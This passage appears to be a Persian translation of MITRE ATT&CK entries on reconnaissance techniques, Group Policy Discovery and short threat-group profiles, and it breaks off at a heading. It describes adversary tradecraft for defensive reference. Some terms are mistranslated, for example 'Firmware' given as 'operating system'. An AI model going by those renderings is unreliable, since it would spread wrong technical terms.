دشمنان ممکن است اطلاعاتی درباره سخت‌افزار میزبان قربانی جمع آوری کنند که می تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به زیرساخت های سخت افزاری ممکن است شامل انواع مختلفی از جزئیات مانند انواع و نسخه ها روی میزبان های خاص و همچنین وجود اجزای اضافی باشد که ممکن است نشان دهنده حفاظت های دفاعی اضافی باشد (به عنوان مثال: خوانندگان کارت/ بیومتریک، سخت افزار رمزگذاری اختصاصی و غیره). دشمنان ممکن است این اطلاعات را به طرق مختلف جمع آوری کنند، مانند اقدامات جمع‌آوری مستقیم از طریق اسکن فعال (به عنوان مثال: نام میزبان، بنر سرور، رشته نماینده کاربر) یا فیشینگ برای اطلاعات. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به زیرساخت های سخت افزاری نیز ممکن است از طریق آنلاین یا سایر مجموعه های داده در دسترس (مانند: آگهی های شغل ، نقشه های شبکه ، گزارشهای ارزیابی ، رزومه یا فاکتورهای خرید) در معرض دید دشمنان قرار گیرد. جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/ دامنه‌های باز یا جستجو در پایگاه های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت ها یا به دست آوردن قابلیت ها) و یا دسترسی اولیه (مانند: مصالحه برای تامین سخت افزار) نشان دهد.

جمع آوری اطلاعات میزبان قربانی: نرم افزار

Gather Victim Host Information: Software

دشمنان ممکن است اطلاعاتی در مورد نرم افزار میزبان قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به نرم افزار نصب شده ممکن است شامل انواع مختلفی از جزئیات مانند انواع و نسخه‌ها روی میزبان‌های خاص و همچنین وجود اجزای اضافی باشد که ممکن است نشان دهنده حفاظت دفاعی اضافی باشد (مانند: آنتی‌ویروس، SIEM و غیره). دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات جمع‌آوری مستقیم از طریق اسکن فعال (مانند: پورت‌های صدا، بنرهای سرور، رشته‌های عامل کاربر) یا فیشینگ برای اطلاعات، جمع‌آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع‌آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به نرم افزار نصب شده نیز ممکن است از طریق آنلاین یا دیگر مجموعه داده‌های در دسترس (مانند: آگهی‌های کار، نقشه‌های شبکه، گزارش‌های ارزیابی، رزومه یا فاکتورهای خرید) در معرض دید دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها/ دامنه‌های باز یا جستجو در پایگاه‌های فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (مانند: زنجیره تامین)

جمع‌آوری اطلاعات میزبان قربانی: سیستم عامل

Gather Victim Host Information: Firmware

دشمنان ممکن است اطلاعاتی در مورد سیستم عامل میزبان قربانی جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات مربوط به سیستم عامل میزبان ممکن است شامل انواع مختلفی از جزئیات مانند نوع و نسخه های مربوط به میزبان خاص باشد، که ممکن است برای استنباط اطلاعات بیشتر در مورد میزبان در محیط (مانند: پیکربندی، هدف، سن/ سطح وصله و غیره) استفاده شود. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات، جمع آوری کنند. اطلاعات مربوط به سیستم عامل میزبان فقط از طریق آنلاین یا سایر مجموعه داده های قابل دسترسی (مانند: آگهی های شغل، نقشه های شبکه، گزارشهای ارزیابی، رزومه یا فاکتورهای خرید) در معرض دشمنی قرار می‌گیرد. جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت ها / دامنه های باز یا جستجو در پایگاه های اطلاعات فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (مانند: مصالحه زنجیره تامین) نشان دهد.

جمع آوری اطلاعات میزبان قربانی: تنظیمات مشتری

Gather Victim Host Information: Client Configurations

دشمنان ممکن است اطلاعاتی در مورد تنظیمات مشتری قربانی جمع آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به پیکربندی کلاینت ممکن است شامل انواع جزئیات و تنظیمات باشد، از جمله سیستم عامل/نسخه، مجازی سازی، معماری (مانند: 32 یا 64 بیت) ، زبان و یا منطقه زمانی. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات جمع آوری مستقیم از طریق اسکن فعال (مانند: پورت‌های صدا، بنرهای سرور، رشته‌های عامل کاربر) یا فیشینگ برای اطلاعات، جمع آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به پیکربندی‌های سرویس گیرنده نیز ممکن است از طریق داده های آنلاین یا دیگر مجموعه های داده در دسترس دشمنان قرار گیرد (مانند: آگهی‌های شغلی‌، نقشه‌های شبکه، گزارش‌های ارزیابی، رزومه یا فاکتورهای خرید). جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/ دامنه های باز یا جستجو در پایگاه های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (به عنوان مثال: سازش زنجیره تامین) نشان دهد.

جمع‌آوری اطلاعات هویت قربانی

Gather Victim Identity Information

دشمنان ممکن است اطلاعاتی در مورد هویت قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به هویت‌ها ممکن است شامل جزئیات مختلفی از جمله داده‌های شخصی (مانند: نام کارکنان، آدرس ایمیل و غیره) و همچنین جزئیات حساس مانند اعتبارنامه باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند استخراج مستقیم از طریق فیشینگ جمع آوری کنند. اطلاعات مربوط به قربانیان همچنین ممکن است از طریق داده‌های آنلاین یا دیگر مجموعه‌های قابل دسترسی (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض مخالفان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: جستجو در وب سایت‌ها/دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (به عنوان مثال: حساب‌های سازش) و/یا دسترسی اولیه (مانند: فیشینگ یا حساب‌های معتبر) نشان دهد.

جمع آوری اطلاعات هویت قربانی: اعتبارنامه

Gather Victim Identity Information: Credentials

دشمنان ممکن است اعتبارنامه‌هایی را جمع آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اعتبارنامه‌های حساب جمع آوری شده توسط دشمنان ممکن است مستقیماً با سازمان قربانی هدف مرتبط باشد یا سعی کنند از تمایل کاربران برای استفاده از رمزهای عبور یکسان در حساب‌های شخصی و تجاری استفاده کنند. دشمنان ممکن است اعتبارهای قربانیان احتمالی را به روش‌های مختلف، مانند درخواست مستقیم از طریق فیشینگ برای اطلاعات، جمع‌آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع آوری کوکی‌های احراز هویت وب سایت از بازدیدکنندگان طراحی شده است. اطلاعات معتبر همچنین ممکن است از طریق نشت به مجموعه داده‌های آنلاین یا دیگر داده‌های در دسترس (مانند: موتورهای جستجو، پایگاه‌های تخلف، مخازن کد و غیره) در معرض دشمنی قرار گیرد. دشمنان همچنین می‌توانند از dark webیا دیگر بازارهای سیاه اعتبارنامه خریداری کنند. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها/ دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (مانند: حساب‌های سازش) و یا دسترسی اولیه (به عنوان مثال: خدمات از راه دور خارجی یا حسابهای معتبر) نشان دهد.

جمع‌آوری اطلاعات هویت قربانی: آدرس‌های ایمیل

Gather Victim Identity Information: Email Addresses

دشمنان ممکن است آدرس های ایمیل را جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. حتی اگر نمونه‌های داخلی وجود داشته باشد، ممکن است سازمان‌ها زیرساخت ایمیل و آدرس کارکنان را در اختیار عموم قرار دهند. دشمنان ممکن است به راحتی آدرس‌های ایمیل را جمع آوری کنند، زیرا ممکن است به آسانی در دسترس باشند و از طریق مجموعه داده‌های آنلاین یا دیگر مجموعه‌های در دسترس (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض دید قرار گیرند. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: جستجو در وب سایت‌ها/دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (مانند: حساب های ایمیل) و یا دسترسی اولیه (مانند: فیشینگ) نشان دهد.

جمع‌آوری اطلاعات هویت قربانی : نام کارکنان

Gather Victim Identity Information: Employee Names

دشمنان ممکن است نام کارکنان را جمع آوری کنند که می‌تواند در هنگام هدف گیری استفاده شود. نام کارکنان برای استخراج آدرس‌های ایمیل و همچنین راهنمایی سایر تلاش‌های شناسایی و یا ایجاد وسوسه‌های باورنکردنی استفاده می شود. دشمنان ممکن است به راحتی اسامی کارکنان را جمع آوری کنند، زیرا ممکن است به آسانی در دسترس باشند و از طریق داده‌های آنلاین یا دیگر مجموعه‌های قابل دسترسی (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در دسترس قرار گیرند. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/ دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (مانند: حساب‌های سازش) و یا دسترسی اولیه (مانند: فیشینگ یا حساب‌های معتبر) نشان دهد.

جمع‌آوری اطلاعات شبکه قربانی

Gather Victim Network Information

دشمنان ممکن است اطلاعاتی در مورد شبکه‌های قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به شبکه‌ها ممکن است شامل جزئیات مختلفی از جمله داده‌های اداری (مانند: محدوده IP، نام دامنه و...) و همچنین مشخصات مربوط به توپولوژی و عملکرد آن باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم از طریق اسکن فعال یا فیشینگ جمع‌آوری کنند. اطلاعات مربوط به شبکه‌ها نیز ممکن است از طریق مجموعه‌های داده آنلاین یا دیگر داد‌ه‌های در دسترس دشمنان قرار گیرد (به عنوان مثال: جستجو در پایگاه‌های فنی باز). جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: اسکن فعال یا جستجوی وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (مانند: به دست آوردن زیرساخت یا زیرساخت سازش) و/یا دسترسی اولیه (مانند: رابطه مورد اعتماد) نشان دهد.

جمع‌آوری اطلاعات شبکه قربانی: ویژگی‌های دامنه

Gather Victim Network Information: Domain Properties

دشمنان ممکن است اطلاعاتی در مورد دامنه‌ (های) شبکه قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به دامنه‌ها و ویژگی‌های آنها ممکن است شامل جزئیات مختلفی باشد، از جمله دامنه (های) قربانی و همچنین اطلاعات اداری (مانند: نام، ثبت کننده و غیره) و اطلاعات مستقیم تر مانند مخاطبین (آدرس ایمیل و تلفن) شماره) ، آدرس‌های تجاری و سرورهای نام. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم جمع آوری از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. اطلاعات مربوط به حوزه های قربانی و ویژگی های آنها نیز ممکن است از طریق مجموعه های داده آنلاین یا دیگر داده های موجود (مانند: (WHOIS) در معرض دید دشمنان قرار گیرد. جمع آوری این اطلاعات ممکن است فرصت هایی برای سایر اشکال شناسایی (به عنوان مثال: جستجو در پایگاه های اطلاعات فنی باز ، جستجو در وب سایت ها/دامنه های باز ، یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا سازش زیرساخت ها) و/یا دسترسی اولیه

جمع‌آوری اطلاعات شبکه قربانی: DNS

Gather Victim Network Information: DNS

دشمنان ممکن است اطلاعاتی در مورد DNS قربانی جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات DNS ممکن است شامل جزئیات مختلفی باشد، از جمله سرورهای نام ثبت شده و همچنین پرونده‌هایی که آدرس زیر دامنه های هدف، سرورهای ایمیل و سایر میزبان ها را مشخص می کند. دشمنان ممکن است این اطلاعات را به روش های مختلف جمع آوری کنند، مانند پرس و جو یا جمع آوری جزئیات از طریق DNS/Passive DNS اطلاعات DNS همچنین ممکن است از طریق مجموعه های داده آنلاین یا دیگر داده های در دسترس در برابر دشمنان قرار گیرد (به عنوان مثال: جستجو در پایگاه‌های اطلاعات فنی باز). جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (مانند: جستجو در پایگاه های اطلاعات فنی باز ، جستجو در وب سایت ها/دامنه های باز ، یا اسکن فعال) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا سازش زیرساخت ها) و یا دسترسی اولیه (سابق : خدمات از راه دور خارجی).

جمع آوری اطلاعات شبکه قربانی: وابستگی های اعتماد شبکه

Gather Victim Network Information: Network Trust Dependencies

دشمنان ممکن است اطلاعاتی در مورد وابستگی های اعتماد شبکه قربانی جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات مربوط به امانت‌های شبکه ممکن است شامل جزئیات مختلفی باشد، از جمله سازمان‌ها یا دامنه های شخص ثالث (مانند: ارائه دهندگان خدمات مدیریت شده، پیمانکاران و غیره) که دسترسی به شبکه را متصل کرده اند (و به طور بالقوه افزایش داده است). دشمنان ممکن است این اطلاعات را به روش های مختلف، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات، جمع آوری کنند. اطلاعات مربوط به امانت‌های شبکه نیز ممکن است از طریق آنلاین یا دیگر مجموعه داده های قابل دسترسی در معرض دشمنی قرار گیرد (به عنوان مثال: جستجو در پایگاه های اطلاعات فنی باز). جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (مانند: اسکن فعال یا جستجوی وب سایت ها/دامنه های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا زیرساخت سازش) و یا دسترسی اولیه (مانند: رابطه مورد اعتماد) نشان دهد.

جمع آوری اطلاعات شبکه قربانی: توپولوژی شبکه

Gather Victim Network Information: Network Topology

دشمنان ممکن است اطلاعاتی در مورد توپولوژی شبکه قربانی جمع آوری کنند که می‌تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات مربوط به توپولوژی‌های شبکه ممکن است شامل جزئیات مختلفی از جمله ترتیب فیزیکی و یا منطقی محیط‌های شبکه خارجی و داخلی باشد. این اطلاعات همچنین ممکن است شامل مشخصات مربوط به دستگاه‌های شبکه (دروازه‌ها، روترها و غیره) و سایر زیرساخت ها باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم جمع آوری از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. اطلاعات مربوط به توپولوژی‌های شبکه نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: وب سایت‌های متعلق به قربانی جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در پایگاه داده های فنی باز یا جستجو در وب سایت ها/دامنه های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا زیرساخت سازش) و/یا دسترسی اولیه (مانند: خدمات از راه دور خارجی) نشان دهد. )

جمع‌آوری اطلاعات شبکه قربانی: آدرس‌های IP

Gather Victim Network Information: IP Addresses

دشمنان ممکن است آدرسIP قربانی را جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. آدرس‌هایIP عمومی ممکن است به صورت بلوک یا طیف وسیعی از آدرس‌های متوالی به سازمان‌ها اختصاص داده شود. اطلاعات مربوط به آدرس‌هایIP اختصاص داده شده ممکن است شامل جزئیات مختلفی باشد، مانند آدرس‌هایIP مورد استفاده. آدرس‌هایIP همچنین ممکن است به دشمن این امکان را بدهد که اطلاعات دیگری در مورد قربانی مانند اندازه سازمان، مکان (های) فیزیکی، ارائه دهنده خدمات اینترنت و یا محل چگونگی میزبانی زیرساخت‌های عمومی آنها بدست آورد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم جمع‌آوری از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. اطلاعات مربوط به آدرس‌های IP اختصاص داده شده نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس دشمنان قرار گیرد (به عنوان مثال: جستجو در پایگاه‌های فنی باز). جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً: پویش فعال یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: زیرساخت‌های زیرساخت یا سازش) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی) را نشان دهد.

جمع‌آوری اطلاعات شبکه قربانی: لوازم امنیتی شبکه

Gather Victim Network Information: Network Security Appliances

دشمنان ممکن است اطلاعاتی در مورد وسایل امنیتی شبکه قربانی جمع آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به تجهیزات امنیتی شبکه ممکن است شامل جزئیات مختلفی باشد، مانند وجود و مشخصات دیوارهای آتش مستقر شده، فیلترهای محتوا، و پراکسی ها. دشمنان همچنین ممکن است اطلاعات مربوط به سیستم‌های تشخیص نفوذ مبتنی بر شبکه قربانی (NIDS) یا سایر ابزارهای مرتبط با عملیات دفاعی امنیت سایبری را هدف قرار دهند. دشمنان ممکن است این اطلاعات را به روش های مختلفی جمع آوری کنند، مانند اقدامات جمع آوری مستقیم از طریق اسکن فعال یا فیشینگ برای اطلاعات. اطلاعات مربوط به وسایل امنیتی شبکه نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده قابل دسترس (مثلاً وب‌سایت‌های متعلق به قربانی جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً جستجو در پایگاه‌های داده فنی باز یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا دریافت قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی) را نشان دهد. ).

جمع‌آوری اطلاعات سازمان قربانیان

Gather Victim Org Information

دشمنان ممکن است اطلاعاتی در مورد سازمان قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به یک سازمان ممکن است شامل جزئیات مختلفی از جمله نام بخش/بخش‌ها، ویژگی‌های عملیات تجاری و همچنین نقش‌ها و مسئولیت‌های کارکنان اصلی باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند استخراج مستقیم از طریق فیشینگ جمع‌آوری کنند. اطلاعات مربوط به یک سازمان نیز ممکن است از طریق داده‌های آنلاین یا دیگر مجموعه‌های قابل دسترسی (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض مخالفان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: ایجاد حساب‌ها یا حساب‌های سازش) و/یا دسترسی اولیه (مانند فیشینگ یا رابطه مورد اعتماد) نشان دهد.

جمع‌آوری اطلاعات سازمان قربانیان: تعیین مکان‌های فیزیکی

Gather Victim Org Information: Determine Physical Locations

دشمنان ممکن است مکان(های) فیزیکی قربانی را جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به مکان‌های فیزیکی یک سازمان هدف ممکن است شامل جزئیات مختلفی باشد، از جمله محل قرارگیری منابع کلیدی و زیرساخت‌ها. مکان‌های فیزیکی ممکن است نشان دهند که قربانی در چه صلاحیت قانونی و/یا مقاماتی فعالیت می‌کند. دشمنان ممکن است این اطلاعات را به روش‌های مختلف جمع‌آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. مکان‌های فیزیکی یک سازمان هدف نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: وب‌سایت‌های متعلق به جستجو قربانی یا رسانه‌های اجتماعی) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا به دست آوردن قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: فیشینگ یا افزودنی‌های سخت‌افزاری) را نشان دهد. ).

جمع‌آوری اطلاعات سازمان قربانیان: روابط تجاری

Gather Victim Org Information: Business Relationships

دشمنان ممکن است اطلاعاتی در مورد روابط تجاری قربانی جمع‌آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به روابط تجاری یک سازمان ممکن است شامل جزئیات مختلفی باشد، از جمله سازمان‌ها/دامنه‌های شخص ثالث(مثلاً: ارائه‌دهندگان خدمات مدیریت شده، پیمانکاران، و غیره) که دسترسی به شبکه متصل(و به طور بالقوه افزایش‌یافته) دارند. این اطلاعات همچنین ممکن است زنجیره های تامین و مسیرهای حمل و نقل برای منابع سخت افزاری و نرم افزاری قربانی را نشان دهد. دشمنان ممکن است این اطلاعات را به روش های مختلف جمع آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. اطلاعات مربوط به روابط تجاری نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانی جستجو)در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی(مثلاً: ایجاد حساب‌ها یا حساب‌های در معرض خطر)، و/یا دسترسی اولیه (مثلاً: سازش در زنجیره تأمین، سازش درایو، یا رابطه مورد اعتماد).

جمع‌آوری اطلاعات سازمان قربانیان: شناسایی سرعت کسب و کار

Gather Victim Org Information: Identify Business Tempo

دشمنان ممکن است اطلاعاتی در مورد سرعت تجاری قربانی جمع‌آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به سرعت کسب‌وکار یک سازمان ممکن است شامل جزئیات مختلفی از جمله ساعات/روزهای عملیاتی هفته باشد. این اطلاعات همچنین ممکن است زمان/تاریخ خرید و ارسال منابع سخت‌افزاری و نرم‌افزاری قربانی را نشان دهد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف جمع‌آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. اطلاعات مربوط به سرعت کسب‌وکار ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانیان جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً ایجاد حساب‌ها یا حساب‌های در معرض خطر)، و/یا دسترسی اولیه (مثلاً: سازش در زنجیره تأمین یا رابطه قابل اعتماد)

جمع‌آوری اطلاعات سازمان قربانیان: شناسایی نقش‌ها

Gather Victim Org Information: Identify Roles

دشمنان ممکن است اطلاعاتی در مورد هویت‌ها و نقش‌ها در سازمان قربانی جمع‌آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به نقش‌های تجاری ممکن است انواع مختلفی از جزئیات قابل هدف را نشان دهد، از جمله اطلاعات قابل شناسایی برای پرسنل کلیدی و همچنین به چه داده ها/منابعی که آنها به آنها دسترسی دارند. دشمنان ممکن است این اطلاعات را به روش‌های مختلف جمع‌آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. اطلاعات مربوط به نقش‌های تجاری نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانی جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: ایجاد حساب‌ها یا حساب‌های در معرض خطر)، و/یا دسترسی اولیه (مثلاً: فیشینگ) را نشان دهد.

کشف خط مشی گروه

Group Policy Discovery

دشمنان ممکن است اطلاعاتی را در مورد تنظیمات Group Policy جمع‌آوری کنند تا مسیرهای افزایش امتیاز، اقدامات امنیتی اعمال شده در یک دامنه، و کشف الگوهایی در اشیاء دامنه را که می‌توان آنها را دستکاری کرد یا برای ترکیب در محیط استفاده کرد، جمع‌آوری کرد. Group Policy امکان مدیریت متمرکز تنظیمات کاربر و کامپیوتر در Active Directory (AD) را فراهم می کند. اشیاء خط مشی گروه(GPO) محفظه هایی برای تنظیمات خط مشی گروه هستند که از فایل‌های ذخیره شده در یک مسیر شبکه قابل پیش بینی \\SYSVOL\\Policies\تشکیل شده است. دشمنان ممکن است از دستوراتی مانند gpresult یا توابع مختلف PowerShell در دسترس عموم، مانند Get-DomainGPO و Get-DomainGPOLocalGroup برای جمع آوری اطلاعات در مورد تنظیمات خط مشی گروه استفاده کنند. دشمنان ممکن است از این اطلاعات برای شکل دادن به رفتارهای بعدی، از جمله تعیین مسیرهای حمله احتمالی در شبکه هدف و همچنین فرصت‌هایی برای دستکاری تنظیمات خط‌مشی گروه (یعنی اصلاح سیاست دامنه) به نفع خود استفاده کنند.

یک گروه تحت حمایت دولت چین

GALLIUM

GALLIUM گروهی است که حداقل از سال 2012 فعال بوده و عمدتاً شبکه های مخابراتی با مشخصات بالا را هدف قرار داده است. GALLIUM در برخی گزارش‌ها به‌عنوان یک گروه تحت حمایت دولت چین شناسایی شده است که تا حدی بر اساس ابزارهای مورد استفاده و TTP‌هایی است که معمولاً با عوامل تهدید چینی مرتبط هستند.

یک گروه جاسوسی سایبری است

Gallmaker

Gallmaker یک گروه جاسوسی سایبری است که قربانیان را در خاورمیانه هدف قرار داده است و حداقل از دسامبر 2017 فعال بوده است. این گروه عمدتاً قربانیان را در بخش‌های دفاعی، نظامی و دولتی هدف قرار داده است.

یک گروه تهدید است

Gamaredon Group

گروه گاماردون یک گروه تهدید است که حداقل از سال 2013 فعال بوده و افرادی که احتمالاً در دولت اوکراین دخیل هستند را هدف قرار داده است. نام گروه گاماردون از غلط املایی کلمه "آرماگدون" گرفته شده است که در مبارزات اولیه دشمن شناسایی شد.

یک گروه تهدید است

GCMAN

GCMAN یک گروه تهدید است که بر هدف قرار دادن بانک ها به منظور انتقال پول به خدمات ارز الکترونیکی تمرکز دارد.

یک گروه تهدید با انگیزه مالی است

GOLD SOUTHFIELD

GOLD SOUTHFIELD یک گروه تهدید با انگیزه مالی است که حداقل از سال 2019 فعال است و سرویس Ransomware-as-a (RaaS) REvil را اجرا می کند. GOLD SOUTHFIELD زیرساخت‌های پشتیبان را برای شرکت‌های وابسته که در انجمن‌های زیرزمینی استخدام می‌شوند برای اجرای استقرار با ارزش بالا فراهم می‌کند.

یک گروه تهدید

Gorgon Group

گروه گورگون یک گروه تهدید متشکل از اعضایی است که گمان می رود ساکن پاکستان باشند یا با پاکستان ارتباط دیگری دارند. این گروه ترکیبی از حملات جنایتکارانه و هدفمند، از جمله کمپین هایی علیه سازمان های دولتی در بریتانیا، اسپانیا، روسیه و ایالات متحده انجام داده است.

یک گروه تهدید با پیوند مشکوک ایرانی است

Group5

